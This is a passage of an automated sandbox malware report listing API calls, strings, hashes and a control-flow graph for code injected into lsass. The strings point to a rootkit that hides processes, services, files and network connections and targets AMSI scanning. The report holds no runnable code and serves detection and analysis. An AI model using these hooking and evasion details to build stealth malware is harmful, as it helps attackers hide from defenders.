                                                    • Part of subcall function 0000017D2DD535C8: HeapAlloc.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD535FE
                                                    • Part of subcall function 0000017D2DD535C8: StrCmpNIW.SHLWAPI(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD53673
                                                    • Part of subcall function 0000017D2DD535C8: GetProcessHeap.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD536D9
                                                    • Part of subcall function 0000017D2DD535C8: HeapFree.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD536E7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                  • String ID: $nya-$S
                                                  • API String ID: 722747020-3492252248
                                                  • Opcode ID: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
                                                  • Instruction ID: 850f05bd11e511c281c5463248047073372b965f77c52c85919e52c47a673e3b
                                                  • Opcode Fuzzy Hash: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
                                                  • Instruction Fuzzy Hash: ED519032A18F6886F760CB65A4807ED6BB8FB65788F08C415DE4D56B46DBB9C8C6C340

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 96f4f97e7589e417bfd216c0fa725ebf6ad4169998ba69a4a526b571fa602114
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: AC5148B4518F8EA5FA00EBA9FC51BD46B30AF40744F889A53940D0656BDEB882DFC780

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: e07f860e85c6e67f3043271f4cb48da2854f5ab70fe7cc9399e9ad5156588ed3
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: 0CD09E30659F48D5FA086F55FC543D43271BFA4B41FCC4415C60E012A6DE6C85DB83C0

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 0000017D2DD53A35
                                                  • PathFindFileNameW.SHLWAPI ref: 0000017D2DD53A44
                                                    • Part of subcall function 0000017D2DD53F88: StrCmpNIW.SHLWAPI(?,?,?,0000017D2DD5272F), ref: 0000017D2DD53FA0
                                                    • Part of subcall function 0000017D2DD53EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53EDB
                                                    • Part of subcall function 0000017D2DD53EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F0E
                                                    • Part of subcall function 0000017D2DD53EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F2E
                                                    • Part of subcall function 0000017D2DD53EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F47
                                                    • Part of subcall function 0000017D2DD53EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F68
                                                  • CreateThread.KERNELBASE ref: 0000017D2DD53A8B
                                                    • Part of subcall function 0000017D2DD51E74: GetCurrentThread.KERNEL32 ref: 0000017D2DD51E7F
                                                    • Part of subcall function 0000017D2DD51E74: CreateThread.KERNELBASE ref: 0000017D2DD52043
                                                    • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52049
                                                    • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52055
                                                    • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52061
                                                    • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD5206D
                                                    • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52079
                                                    • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52085
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                  • String ID:
                                                  • API String ID: 2779030803-0
                                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction ID: e2bbf7035cdc9e916597a18426b5085288f4986e6ebd83389e25a87e83549494
                                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction Fuzzy Hash: 0C119E3161CF4983FB70A760B9493D962B0AF54345F4C0219958E811D7EFBEC4DB8640
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000003.1604607101.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_3_17d2dd20000_lsass.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: 6b752afb91a17aad29154e99fbe11468da530b570cc38a148516e43257cf4422
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: 6A912472B05B5887DB608F25E509BB9B3B1FB45B94F5880299E8D0778FDA38D883C710

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0000017D2DD51724: GetProcessHeap.KERNEL32 ref: 0000017D2DD5172F
                                                    • Part of subcall function 0000017D2DD51724: HeapAlloc.KERNEL32 ref: 0000017D2DD5173E
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD517AE
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD517DB
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD517F5
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51815
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD51830
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51850
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD5186B
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5188B
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD518A6
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD518C6
                                                  • SleepEx.KERNELBASE ref: 0000017D2DD51BDF
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD518E1
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51901
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD5191C
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5193C
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD51957
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51977
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD51992
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD5199C
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction ID: a513e6edbe1b9579d93716c2874b51edf92661d58ab9acfd5c96824e1f791f21
                                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction Fuzzy Hash: 4731DD75208F4981FB509B26FE413F9B3B4AF44BC0F1C58219E0E8769BDEA5D8D38215

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 243 17d2dd52ff0-17d2dd53069 245 17d2dd53384-17d2dd533a7 243->245 246 17d2dd5306f-17d2dd53075 243->246 246->245 247 17d2dd5307b-17d2dd5307e 246->247 247->245 248 17d2dd53084-17d2dd53087 247->248 248->245 249 17d2dd5308d-17d2dd5309d GetModuleHandleA 248->249 250 17d2dd530b1 249->250 251 17d2dd5309f-17d2dd530af GetProcAddress 249->251 252 17d2dd530b4-17d2dd530d2 250->252 251->252 252->245 254 17d2dd530d8-17d2dd530f7 StrCmpNIW 252->254 254->245 255 17d2dd530fd-17d2dd53101 254->255 255->245 256 17d2dd53107-17d2dd53111 255->256 256->245 257 17d2dd53117-17d2dd5311e 256->257 257->245 258 17d2dd53124-17d2dd53137 257->258 259 17d2dd53139-17d2dd53145 258->259 260 17d2dd53147 258->260 261 17d2dd5314a-17d2dd5314e 259->261 260->261 262 17d2dd5315e 261->262 263 17d2dd53150-17d2dd5315c 261->263 264 17d2dd53161-17d2dd5316b 262->264 263->264 265 17d2dd53251-17d2dd53255 264->265 266 17d2dd53171-17d2dd53174 264->266 267 17d2dd5325b-17d2dd5325e 265->267 268 17d2dd53376-17d2dd5337e 265->268 269 17d2dd53186-17d2dd53190 266->269 270 17d2dd53176-17d2dd53183 call 17d2dd51a30 266->270 271 17d2dd53260-17d2dd5326c call 17d2dd51a30 267->271 272 17d2dd5326f-17d2dd53279 267->272 268->245 268->258 274 17d2dd53192-17d2dd5319f 269->274 275 17d2dd531c4-17d2dd531ce 269->275 270->269 271->272 280 17d2dd532a9-17d2dd532ac 272->280 281 17d2dd5327b-17d2dd53288 272->281 274->275 276 17d2dd531a1-17d2dd531ae 274->276 277 17d2dd531fe-17d2dd53201 275->277 278 17d2dd531d0-17d2dd531dd 275->278 283 17d2dd531b1-17d2dd531b7 276->283 286 17d2dd53203-17d2dd5320d call 17d2dd51cc4 277->286 287 17d2dd5320f-17d2dd5321c lstrlenW 277->287 278->277 284 17d2dd531df-17d2dd531ec 278->284 289 17d2dd532ae-17d2dd532b7 call 17d2dd51cc4 280->289 290 17d2dd532b9-17d2dd532c6 lstrlenW 280->290 281->280 288 17d2dd5328a-17d2dd53297 281->288 292 17d2dd531bd-17d2dd531c2 283->292 293 17d2dd53247-17d2dd5324c 283->293 296 17d2dd531ef-17d2dd531f5 284->296 286->287 286->293 299 17d2dd5321e-17d2dd5322d call 17d2dd51cfc 287->299 300 17d2dd5322f-17d2dd53241 call 17d2dd53f88 287->300 298 17d2dd5329a-17d2dd532a0 288->298 289->290 309 17d2dd532ee-17d2dd532f9 289->309 294 17d2dd532d9-17d2dd532e3 call 17d2dd53f88 290->294 295 17d2dd532c8-17d2dd532d7 call 17d2dd51cfc 290->295 292->275 292->283 303 17d2dd532e6-17d2dd532e8 293->303 294->303 295->294 295->309 296->293 306 17d2dd531f7-17d2dd531fc 296->306 308 17d2dd532a2-17d2dd532a7 298->308 298->309 299->293 299->300 300->293 300->303 303->268 303->309 306->277 306->296 308->280 308->298 314 17d2dd53370-17d2dd53374 309->314 315 17d2dd532fb-17d2dd532ff 309->315 314->268 317 17d2dd53301-17d2dd53305 315->317 318 17d2dd53307-17d2dd53321 call 17d2dd63a40 315->318 317->318 319 17d2dd53324-17d2dd53327 317->319 318->319 321 17d2dd5334a-17d2dd5334d 319->321 322 17d2dd53329-17d2dd53347 call 17d2dd63a40 319->322 321->314 325 17d2dd5334f-17d2dd5336d call 17d2dd63a40 321->325 322->321 325->314
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: f2f135d611cdf066e5d6a521eba2869d786744282965d2fc11769e0904ffb0c5
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: D9B16C32218F9883EB658F65E500BE9A3B4FB45B84F485016EE8D53B96DEB5CDD2C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: 743912c070fe1f327d28e93256d600cb52e0adf25c8753936ac792564c150e2a
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: 1A311972209F8486EB608F60F8407EE6375FB88744F48442ADB4E47B9ADF78C589C750
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: e05f22906aac1c5737550f033233ca4beb2db7fc8e70f9253c9fc50d3ade9d7f
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 08415B36218F8486EB60CF25F8403DE73B4FB89794F580615EA9D46B9ADF78C196CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: f51d33f7841fded307b15e8a4b62ad0d3aa425269e7a372565180428a9a7dba0
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: 99A1A532708B8989FB20DB75B8407EE6BB1EB45794F1C4115DA9D27A9ADAB8C4C3C710

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3572789727
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 6a5a73e90e15d5065503e619210b3abc3386d86c0bf07523f252400ee6381c03
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: F771E736218F5986EB209F66F8906D933B4FF84B88F481211DE4D57B6ADE78C4C6C780

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: c9bf57815c647d5cb5a2bf4a54b90c79dd327f0def2c695701b12de31f15661d
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: 91512B32218B8896EB24CF62F44839A77B1FB88F98F484124DA4D07759DF7CC08A8780

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 4972e08af1195b3f28e5aa5d2d33d3d318c4d8e495bad8b93d07054ccc4bb4d3
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 39516C31749F4C51EA149B66B8407E922B0AF48BB0F5C07259E3D4B7D6EFB8D4878690

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 422347752cb8a5a5f4ba61478ceba83143f2d89ceaa727bce76a7423e00b515b
